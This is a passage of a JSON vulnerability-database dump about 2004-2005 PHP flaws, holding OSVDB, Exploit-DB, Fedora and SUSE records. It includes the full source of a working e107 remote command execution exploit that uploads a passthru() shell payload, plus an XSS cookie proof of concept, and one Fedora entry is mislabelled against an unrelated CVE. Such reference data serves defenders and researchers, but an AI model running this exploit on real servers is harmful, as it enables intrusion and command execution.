12414](https://vulners.com/osvdb/OSVDB:12414)\nRedHat RHSA: RHSA-2005:031\nRedHat RHSA: RHSA-2005:816\nOther Advisory URL: http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000915\nOther Advisory URL: http://www.hardened-php.net/advisories/012004.txt\nOther Advisory URL: http://www.novell.com/linux/security/advisories/2005_02_php4_mod_php4.html\nOther Advisory URL: http://www.ubuntulinux.org/support/documentation/usn/usn-66-1\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200412-14.xml\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:151\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-08/0146.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0332.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-12/0173.html\nKeyword: SCOSA-2005.49\nKeyword: SSRT5998\nISS X-Force ID: 18514\n[CVE-2004-1019](https://vulners.com/cve/CVE-2004-1019)\n", "modified": "2004-12-15T08:12:00", "published": "2004-12-15T08:12:00", "href": "https://vulners.com/osvdb/OSVDB:12415", "id": "OSVDB:12415", "type": "osvdb", "title": "PHP unserialize() Function Negative Reference Arbitrary Code Execution", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:17", "bulletinFamily": "software", "cvelist": ["CVE-2005-3388"], "edition": 1, "description": "## Vulnerability Description\nPHP contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate input (i.e. crafted URL with a stacked array assignment) passed to the phpinfo() function. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Solution Description\nUpgrade to version 4.4.1, 5.1.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPHP contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate input (i.e. crafted URL with a stacked array assignment) passed to the phpinfo() function. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Manual Testing Notes\nphpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>\n## References:\nVendor URL: http://www.php.net/\nVendor Specific News/Changelog Entry: http://www.php.net/release_4_4_1.php\n[Vendor Specific Advisory URL](http://www.trustix.org/errata/2005/0062/)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-037.htm)\n[Vendor Specific Advisory URL](http://itrc.hp.com/service/cki/docDisplay.do?docId=c00786522)\nSecurity Tracker: 1015130\n[Secunia Advisory ID:17666](https://secuniaresearch.flexerasoftware.com/advisories/17666/)\n[Secunia Advisory ID:17757](https://secuniaresearch.flexerasoftware.com/advisories/17757/)\n[Secunia Advisory ID:17557](https://secuniaresearch.flexerasoftware.com/advisories/17557/)\n[Secunia Advisory ID:18669](https://secuniaresearch.flexerasoftware.com/advisories/18669/)\n[Secunia Advisory ID:17371](https://secuniaresearch.flexerasoftware.com/advisories/17371/)\n[Secunia Advisory ID:17490](https://secuniaresearch.flexerasoftware.com/advisories/17490/)\n[Secunia Advisory ID:17531](https://secuniaresearch.flexerasoftware.com/advisories/17531/)\n[Secunia Advisory ID:17510](https://secuniaresearch.flexerasoftware.com/advisories/17510/)\n[Secunia Advisory ID:21252](https://secuniaresearch.flexerasoftware.com/advisories/21252/)\n[Secunia Advisory ID:22691](https://secuniaresearch.flexerasoftware.com/advisories/22691/)\n[Secunia Advisory ID:18198](https://secuniaresearch.flexerasoftware.com/advisories/18198/)\n[Related OSVDB ID: 20407](https://vulners.com/osvdb/OSVDB:20407)\n[Related OSVDB ID: 20408](https://vulners.com/osvdb/OSVDB:20408)\nRedHat RHSA: RHSA-2006:0549\nRedHat RHSA: RHSA-2005:831\n\nOther Advisory URL: http://www.hardened-php.net/advisory_182005.77.html\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200511-08.xml\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20051101-01-U.asc\nOther Advisory URL: http://frontal2.mandriva.com/security/advisories?name=MDKSA-2005:213\nOther Advisory URL: http://www.ubuntu.com/usn/usn-232-1\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0645.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0653.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0652.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0659.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0650.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0093.html\nKeyword: HPSBMA02159,SSRT061238\nISS X-Force ID: 10355\n[CVE-2005-3388](https://vulners.com/cve/CVE-2005-3388)\nBugtraq ID: 15248\n", "modified": "2005-10-31T00:00:00", "published": "2005-10-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:20406", "id": "OSVDB:20406", "type": "osvdb", "title": "PHP phpinfo() Function Stacked Array Assignment XSS", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:17", "bulletinFamily": "software", "cvelist": ["CVE-2005-3389"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www.trustix.org/errata/2005/0062/)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-037.htm)\n[Vendor Specific Advisory URL](http://itrc.hp.com/service/cki/docDisplay.do?docId=c00786522)\nSecurity Tracker: 1015131\n[Secunia Advisory ID:17666](https://secuniaresearch.flexerasoftware.com/advisories/17666/)\n[Secunia Advisory ID:17757](https://secuniaresearch.flexerasoftware.com/advisories/17757/)\n[Secunia Advisory ID:17557](https://secuniaresearch.flexerasoftware.com/advisories/17557/)\n[Secunia Advisory ID:18669](https://secuniaresearch.flexerasoftware.com/advisories/18669/)\n[Secunia Advisory ID:17371](https://secuniaresearch.flexerasoftware.com/advisories/17371/)\n[Secunia Advisory ID:17490](https://secuniaresearch.flexerasoftware.com/advisories/17490/)\n[Secunia Advisory ID:17531](https://secuniaresearch.flexerasoftware.com/advisories/17531/)\n[Secunia Advisory ID:17510](https://secuniaresearch.flexerasoftware.com/advisories/17510/)\n[Secunia Advisory ID:21252](https://secuniaresearch.flexerasoftware.com/advisories/21252/)\n[Secunia Advisory ID:22691](https://secuniaresearch.flexerasoftware.com/advisories/22691/)\n[Secunia Advisory ID:18054](https://secuniaresearch.flexerasoftware.com/advisories/18054/)\n[Secunia Advisory ID:18198](https://secuniaresearch.flexerasoftware.com/advisories/18198/)\n[Related OSVDB ID: 20408](https://vulners.com/osvdb/OSVDB:20408)\n[Related OSVDB ID: 20406](https://vulners.com/osvdb/OSVDB:20406)\nRedHat RHSA: RHSA-2006:0549\nRedHat RHSA: RHSA-2005:831\n\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2005-Dec/0005.html\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200511-08.xml\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20051101-01-U.asc\nOther Advisory URL: http://www.hardened-php.net/advisory_192005.78.html\nOther Advisory URL: http://frontal2.mandriva.com/security/advisories?name=MDKSA-2005:213\nOther Advisory URL: http://www.ubuntu.com/usn/usn-232-1\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0646.html\nKeyword: HPSBMA02159,SSRT061238\n[CVE-2005-3389](https://vulners.com/cve/CVE-2005-3389)\nBugtraq ID: 15249\n", "modified": "2005-10-31T14:12:43", "published": "2005-10-31T14:12:43", "href": "https://vulners.com/osvdb/OSVDB:20407", "id": "OSVDB:20407", "type": "osvdb", "title": "PHP parse_str() memory_limit Request Termination register_globals Manipulation", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-03T03:36:49", "description": "PHP 4.x/5.0.x File Upload GLOBAL Variable Overwrite Vulnerability. CVE-2005-3390. Remote exploit for php platform", "published": "2005-10-31T00:00:00", "type": "exploitdb", "title": "PHP 4.x/5.0.x File Upload GLOBAL Variable Overwrite Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3390"], "modified": "2005-10-31T00:00:00", "id": "EDB-ID:26443", "href": "https://www.exploit-db.com/exploits/26443/", "sourceData": "source: http://www.securityfocus.com/bid/15250/info\r\n\r\nPHP is prone to a vulnerability that allows attackers to overwrite the GLOBAL variable via HTTP POST requests.\r\n\r\nBy exploiting this issue, remote attackers may be able to overwrite the GLOBAL variable. This may allow attackers to further exploit latent vulnerabilities in PHP scripts.\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\nprint_r('\r\n--------------------------------------------------------------------------------\r\ne107 <= 0.75 GLOBALS[] overwrite/Zend_Hash_Del_Key_Or_Index remote commands\r\nexecution exploit\r\nby rgod rgod@autistici.org\r\nsite: http://retrogod.altervista.org\r\ndork: \"This site is powered by e107\"|inurl:e107_plugins|e107_handlers|e107_files\r\n--------------------------------------------------------------------------------\r\n');\r\n/*\r\nworks with register_globals=On\r\nagainst PHP < 4.4.1, 5 < PHP < 5.0.6\r\n*/\r\nif ($argc<4) {\r\nprint_r('\r\n--------------------------------------------------------------------------------\r\nUsage: php '.$argv[0].' host path cmd OPTIONS\r\nhost: target server (ip/hostname)\r\npath: path to e107\r\ncmd: a shell command\r\nOptions:\r\n -p[port]: specify a port other than 80\r\n -P[ip:port]: specify a proxy\r\nExample:\r\nphp '.$argv[0].' localhost /e107/ ls -la -P1.1.1.1:80\r\nphp '.$argv[0].' localhost /e107/ cat ./../../../../e107_config.php -p81\r\n--------------------------------------------------------------------------------\r\n');\r\ndie;\r\n}\r\n/*\r\nsoftware site: http://e107.org/\r\n\r\nvulnerable code in class2.php near lines 29-37:\r\n...\r\n// Destroy! (if we need to)\r\nif($register_globals == true){\r\n\twhile (list($global) = each($GLOBALS)) {\r\n\t\tif (!preg_match('/^(_POST|_GET|_COOKIE|_SERVER|_FILES|GLOBALS|HTTP.*|_REQUEST|retrieve_prefs|eplug_admin)$/', $global)) {\r\n\t\tunset($$global); [**]\r\n\t\t}\r\n\t}\r\n\tunset($global);\r\n}\r\n...\r\nand in e107_handlers/tiny_mce/plugins/ibrowser/ibrowser.php near lines 26-40:\r\n\r\n...\r\nrequire_once(\"../../../../class2.php\");\r\nif (!defined('e107_INIT')) { exit; }\r\nunset($tinyMCE_imglib_include); //[*]\r\n\r\n// include image library config settings\r\ninclude 'config.php';\r\n\r\n$request_uri = urldecode(empty($HTTP_POST_VARS['request_uri'])?(empty($HTTP_GET_VARS['request_uri'])?'':$HTTP_GET_VARS['request_uri']):$HTTP_POST_VARS['request_uri']);\r\n\r\n// if set include file specified in $tinyMCE_imglib_include\r\n\r\nif (!empty($tinyMCE_imglib_include))\r\n{\r\n include $tinyMCE_imglib_include; ///[***]\r\n}\r\n...\r\n\r\nyou can evade [*] by sending the hash keys of $tinyMCE_imglib_include var and\r\n[**] (this *should* unsets the hash keys...) by sending a multipart/form-data\r\nrequest with the \"GLOBALS\" var\r\n\r\nhere [***] the code will include the temporary file and execute our shellcode\r\n\r\nsee http://www.hardened-php.net/hphp/zend_hash_del_key_or_index_vulnerability.html\r\nand http://www.hardened-php.net/advisory_202005.79.html\r\n\r\nfor details about this php vulnerabilities\r\n*/\r\n\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo \"\\r\\n\".$html;\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$cmd=\"\";\r\n$port=80;\r\n$proxy=\"\";\r\nfor ($i=3; $i<$argc; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif (($temp<>\"-p\") and ($temp<>\"-P\")) {$cmd.=\" \".$argv[$i];}\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\n}\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n$data=\"-----------------------------7d529a1d23092a\\r\\n\"; #oh, I want to tell you a story, about a Telecom guy *\r\n$data.=\"Content-Disposition: form-data; name=\\\"tinyMCE_imglib_include\\\"; filename=\\\"suntzu\\\";\\r\\n\"; #that doesn't know *\r\n$data.=\"Content-Type: image/jpeg;\\r\\n\\r\\n\"; #the sovereign art of PHP kung-fu, now is desperate and he's seriously *\r\n$data.=\"<?php error_reporting(0);set_time_limit(0);echo 'my_delim';passthru('\".$cmd.\"');echo 'my_delim'; die;?>\\r\\n\";# *\r\n$data.=\"-----------------------------7d529a1d23092a\\r\\n\"; #thinking to kill himself, after he loosed his work *\r\n$data.=\"Content-Disposition: form-data; name=\\\"-1203709508\\\"; filename=\\\"suntzu\\\";\\r\\n\";//and his honour and self-respect*\r\n$data.=\"Content-Type: image/jpeg;\\r\\n\\r\\n\"; //because of some brave guys that rooted his boxes.*\r\n$data.=\"1\\r\\n\";# *\r\n$data.=\"-----------------------------7d529a1d23092a\\r\\n\"; #Now, guy, don't cry anymore, but... do something *\r\n$data.=\"Content-Disposition: form-data; name=\\\"225672436\\\"; filename=\\\"suntzu\\\";\\r\\n\"; #useful, please open the PHP *\r\n$data.=\"Content-Type: image/jpeg;\\r\\n\\r\\n\"; #manual, like a respectful student. And start to... *\r\n$data.=\"1\\r\\n\";# *\r\n$data.=\"-----------------------------7d529a1d23092a\\r\\n\";# *\r\n$data.=\"Content-Disposition: form-data; name=\\\"GLOBALS\\\"; filename=\\\"suntzu\\\";\\r\\n\";# *\r\n$data.=\"Content-Type: image/jpeg;\\r\\n\\r\\n\";# *\r\n$data.=\"1\\r\\n\";# *\r\n$data.=\"-----------------------------7d529a1d23092a--\\r\\n\";# *\r\n$packet =\"POST \".$p.\"e107_handlers/tiny_mce/plugins/ibrowser/ibrowser.php HTTP/1.0\\r\\n\";# *\r\n$packet.=\"Host: \".$host.\"\\r\\n\";# *\r\n$packet.=\"Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\\r\\n\";# *\r\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";# *\r\n$packet.=\"Accept: text/plain\\r\\n\";# *\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";# *\r\n$packet.=$data;# *\r\nsendpacketii($packet);# *\r\nif (strstr($html,\"my_delim\")){# *\r\necho \"exploit succeeded...\\n\";$temp=explode(\"my_delim\",$html);die($temp[1]); #...pray *\r\n}\r\necho \"exploit failed... register_globals=off here or wrong PHP version\\n\";\r\n?>", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/26443/"}, {"lastseen": "2016-02-03T03:36:41", "description": "PHP 4.x PHPInfo Cross-Site Scripting Vulnerability. CVE-2005-3388 . Webapps exploit for php platform", "published": "2005-10-31T00:00:00", "type": "exploitdb", "title": "PHP 4.x PHPInfo Cross-Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3388"], "modified": "2005-10-31T00:00:00", "id": "EDB-ID:26442", "href": "https://www.exploit-db.com/exploits/26442/", "sourceData": "source: http://www.securityfocus.com/bid/15248/info\r\n\r\nPHP is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.\r\n\r\nAn attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. \r\n\r\nhttp://www.example.com/phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script> ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/26442/"}], "fedora": [{"lastseen": "2020-12-21T08:17:56", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3388"], "description": "This package contains the set of CA certificates chosen by the Mozilla Foundation for use with the Internet PKI. ", "modified": "2020-06-23T01:23:25", "published": "2020-06-23T01:23:25", "id": "FEDORA:87D4330CDA96", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: ca-certificates-2020.2.41-1.1.fc32", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "suse": [{"lastseen": "2016-09-04T11:51:27", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3353", "CVE-2005-3392", "CVE-2005-3389", "CVE-2005-3391", "CVE-2005-3390", "CVE-2005-3883"], "description": "Updated PHP packages fix the following security issues: - Stefan Esser found out that a bug in parse_str() could lead to activation of register_globals (CVE-2005-3389) and additionally that file uploads could overwrite $GLOBALS (CVE-2005-3390) - Bugs in the exif code could lead to a crash (CVE-2005-3353) - Missing safe_mode checks in image processing code and cURL functions allowed to bypass safe_mode and open_basedir (CVE-2005-3391) - Information leakage via the virtual() function (CVE-2005-3392) - Missing input sanitation in the mb_send_mail() function potentially allowed to inject arbitrary mail headers (CVE-2005-3883) The previous security update for php caused crashes when mod_rewrite was used. The updated packages fix that problem as well.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2005-12-14T16:26:50", "published": "2005-12-14T16:26:50", "id": "SUSE-SA:2005:069", "href": "http://lists.opensuse.org/opensuse-security-announce/2005-12/msg00012.html", "type": "suse", "title": "remote code execution in php4,php5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:41:56", "bulletinFamily": "unix", "cvelist": ["CVE-2004-1065", "CVE-2004-1019"], "description": "PHP is a well known, widely-used scripting language often used within web server setups.\n#### Solution\nThere is no workaround known besides disabling PHP. Therefore we recommend to install the updated packages.", "edition": 1, "modified": "2005-01-17T17:12:32", "published": "2005-01-17T17:12:32", "id": "SUSE-SA:2005:002", "href": "http://lists.opensuse.org/opensuse-security-announce/2005-01/msg00010.html", "title": "remote code execution in php4, mod_php4", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:42:02", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0232", "CVE-2014-9427", "CVE-2014-8142", "CVE-2015-0231", "CVE-2004-1019"], "description": "php5 was updated to fix four security issues.\n\n These security issues were fixed:\n - CVE-2015-0231: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x\n before 5.5.21, and 5.6.x before 5.6.5 allowed remote attackers to\n execute arbitrary code via a crafted unserialize call that leverages\n improper handling of duplicate numerical keys within the serialized\n properties of an object. NOTE: this vulnerability exists because of an\n incomplete fix for CVE-2014-8142 (bnc#910659).\n - CVE-2014-9427: sapi/cgi/cgi_main.c in the CGI component in PHP through\n 5.4.36, 5.5.x through 5.5.20, and 5.6.x through 5.6.4, when mmap is used\n to read a .php file, did not properly consider the mapping's length\n during processing of an invalid file that begins with a # character and\n lacks a newline character, which caused an out-of-bounds read and might\n (1) allow remote attackers to obtain sensitive information from php-cgi\n process memory by leveraging the ability to upload a .php file or (2)\n trigger unexpected code execution if a valid PHP script is present in\n memory locations adjacent to the mapping (bnc#911664).\n - CVE-2015-0232: The exif_process_unicode function in ext/exif/exif.c in\n PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allowed\n remote attackers to execute arbitrary code or cause a denial of service\n (uninitialized pointer free and application crash) via crafted EXIF data\n in a JPEG image (bnc#914690).\n - CVE-2014-8142: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x\n before 5.5.20, and 5.6.x before 5.6.4 allowed remote attackers to\n execute arbitrary code via a crafted unserialize call that leverages\n improper handling of duplicate keys within the serialized properties of\n an object, a different vulnerability than CVE-2004-1019 (bnc#910659).\n\n Additionally a fix was included that protects against a possible NULL\n pointer use (bnc#910659).\n\n This non-security issue was fixed:\n - php53 ignored default_socket_timeout on outgoing SSL connection\n (bnc#907519).\n\n", "edition": 1, "modified": "2015-02-24T11:05:36", "published": "2015-02-24T11:05:36", "id": "SUSE-SU-2015:0365-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00029.html", "title": "Security update for php5 (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:09:51", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2014-9767", "CVE-2016-4342", "CVE-2015-2783", "CVE-2015-8873", "CVE-2015-5161", "CVE-2015-3329", "CVE-2014-3478", "CVE-2016-4540", "CVE-2016-4538", "CVE-2015-4644", "CVE-2015-8879", "CVE-2015-1352", "CVE-2016-3185", "CVE-2016-4544", "CVE-2015-2301", "CVE-2014-3515", "CVE-2014-3479", "CVE-2015-8867", "CVE-2014-9709", "CVE-2014-4670", "CVE-2015-2305", "CVE-2016-4543", "CVE-2014-3668", "CVE-2015-0273", "CVE-2016-4542", "CVE-2016-4541", "CVE-2014-3480", "CVE-2014-8142", "CVE-2015-4148", "CVE-2006-7243", "CVE-2014-0207", "CVE-2016-2554", "CVE-2014-3669", "CVE-2015-4024", "CVE-2015-8835", "CVE-2015-4021", "CVE-2014-3487", "CVE-2014-3597", "CVE-2015-6836", "CVE-2015-3152", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-6833", "CVE-2014-4721", "CVE-2016-4070", "CVE-2014-4698", "CVE-2015-8874", "CVE-2015-3411", "CVE-2015-4116", "CVE-2014-4049", "CVE-2015-6831", "CVE-2014-3670", "CVE-2015-5590", "CVE-2015-4600", "CVE-2015-4022", "CVE-2014-9652", "CVE-2015-3412", "CVE-2016-4539", "CVE-2015-6837", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-5095", "CVE-2016-4073", "CVE-2015-7803", "CVE-2014-5459", "CVE-2015-4603", "CVE-2015-4599", "CVE-2016-5096", "CVE-2015-4598", "CVE-2015-8866", "CVE-2015-5589", "CVE-2016-3141", "CVE-2015-4643", "CVE-2015-8838", "CVE-2016-4346", "CVE-2015-0231", "CVE-2016-5114", "CVE-2004-1019", "CVE-2016-3142", "CVE-2015-6838", "CVE-2016-4537"], "edition": 1, "description": "This update for php53 to version 5.3.17 fixes the following issues:\n\n These security issues were fixed:\n - CVE-2016-5093: get_icu_value_internal out-of-bounds read (bnc#982010).\n - CVE-2016-5094: Don't create strings with lengths outside int range\n (bnc#982011).\n - CVE-2016-5095: Don't create strings with lengths outside int range\n (bnc#982012).\n - CVE-2016-5096: int/size_t confusion in fread (bsc#982013).\n - CVE-2016-5114: fpm_log.c memory leak and buffer overflow (bnc#982162).\n - CVE-2015-8879: The odbc_bindcols function in ext/odbc/php_odbc.c in PHP\n mishandles driver behavior for SQL_WVARCHAR columns, which allowed\n remote attackers to cause a denial of service (application crash) in\n opportunistic circumstances by leveraging use of the odbc_fetch_array\n function to access a certain type of Microsoft SQL Server table\n (bsc#981050).\n - CVE-2015-4116: Use-after-free vulnerability in the spl_ptr_heap_insert\n function in ext/spl/spl_heap.c in PHP allowed remote attackers to\n execute arbitrary code by triggering a failed SplMinHeap::compare\n operation (bsc#980366).\n - CVE-2015-8874: Stack consumption vulnerability in GD in PHP allowed\n remote attackers to cause a denial of service via a crafted\n imagefilltoborder call (bsc#980375).\n - CVE-2015-8873: Stack consumption vulnerability in Zend/zend_exceptions.c\n in PHP allowed remote attackers to cause a denial of service\n (segmentation fault) via recursive method calls (bsc#980373).\n - CVE-2016-4540: The grapheme_stripos function in\n ext/intl/grapheme/grapheme_string.c in PHP allowed remote attackers to\n cause a denial of service (out-of-bounds read) or possibly have\n unspecified other impact via a negative offset (bsc#978829).\n - CVE-2016-4541: The grapheme_strpos function in\n ext/intl/grapheme/grapheme_string.c in PHP allowed remote attackers to\n cause a denial of service (out-of-bounds read) or possibly have\n unspecified other impact via a negative offset (bsc#978829.\n - CVE-2016-4542: The exif_process_IFD_TAG function in ext/exif/exif.c in\n PHP did not properly construct spprintf arguments, which allowed remote\n attackers to cause a denial of service (out-of-bounds read) or possibly\n have unspecified other impact via crafted header data (bsc#978830).\n - CVE-2016-4543: The exif_process_IFD_in_JPEG function in ext/exif/exif.c\n in PHP did not validate IFD sizes, which allowed remote attackers to\n cause a denial of service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header data (bsc#978830.\n - CVE-2016-4544: The exif_process_TIFF_in_JPEG function in ext/exif/exif.c\n in PHP did not validate TIFF start data, which allowed remote attackers\n to cause a denial of service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header data (bsc#978830.\n - CVE-2016-4537: The bcpowmod function in ext/bcmath/bcmath.c in PHP\n accepted a negative integer for the scale argument, which allowed remote\n attackers to cause a denial of service or possibly have unspecified\n other impact via a crafted call (bsc#978827).\n - CVE-2016-4538: The bcpowmod function in ext/bcmath/bcmath.c in PHP\n modified certain data structures without considering whether they are\n copies of the _zero_, _one_, or _two_ global variable, which allowed\n remote attackers to cause a denial of service or possibly have\n unspecified other impact via a crafted call (bsc#978827).\n - CVE-2016-4539: The xml_parse_into_struct function in ext/xml/xml.c in\n PHP allowed remote attackers to cause a denial of service (buffer\n under-read and segmentation fault) or possibly have unspecified other\n impact via crafted XML data in the second argument, leading to a parser\n level of zero (bsc#978828).\n - CVE-2016-4342: ext/phar/phar_object.c in PHP mishandles zero-length\n uncompressed data, which allowed remote attackers to cause a denial of\n service (heap memory corruption) or possibly have unspecified other\n impact via a crafted (1) TAR, (2) ZIP, or (3) PHAR archive (bsc#977991).\n - CVE-2016-4346: Integer overflow in the str_pad function in\n ext/standard/string.c in PHP allowed remote attackers to cause a denial\n of service or possibly have unspecified other impact via a long string,\n leading to a heap-based buffer overflow (bsc#977994).\n - CVE-2016-4073: Multiple integer overflows in the mbfl_strcut function in\n ext/mbstring/libmbfl/mbfl/mbfilter.c in PHP allowed remote attackers to\n cause a denial of service (application crash) or possibly execute\n arbitrary code via a crafted mb_strcut call (bsc#977003).\n - CVE-2015-8867: The openssl_random_pseudo_bytes function in\n ext/openssl/openssl.c in PHP incorrectly relied on the deprecated\n RAND_pseudo_bytes function, which made it easier for remote attackers to\n defeat cryptographic protection mechanisms via unspecified vectors\n (bsc#977005).\n - CVE-2016-4070: Integer overflow in the php_raw_url_encode function in\n ext/standard/url.c in PHP allowed remote attackers to cause a denial of\n service (application crash) via a long string to the rawurlencode\n function (bsc#976997).\n - CVE-2015-8866: ext/libxml/libxml.c in PHP when PHP-FPM is used, did not\n isolate each thread from libxml_disable_entity_loader changes in other\n threads, which allowed remote attackers to conduct XML External Entity\n (XXE) and XML Entity Expansion (XEE) attacks via a crafted XML document,\n a related issue to CVE-2015-5161 (bsc#976996).\n - CVE-2015-8838: ext/mysqlnd/mysqlnd.c in PHP used a client SSL option to\n mean that SSL is optional, which allowed man-in-the-middle attackers to\n spoof servers via a cleartext-downgrade attack, a related issue to\n CVE-2015-3152 (bsc#973792).\n - CVE-2015-8835: The make_http_soap_request function in\n ext/soap/php_http.c in PHP did not properly 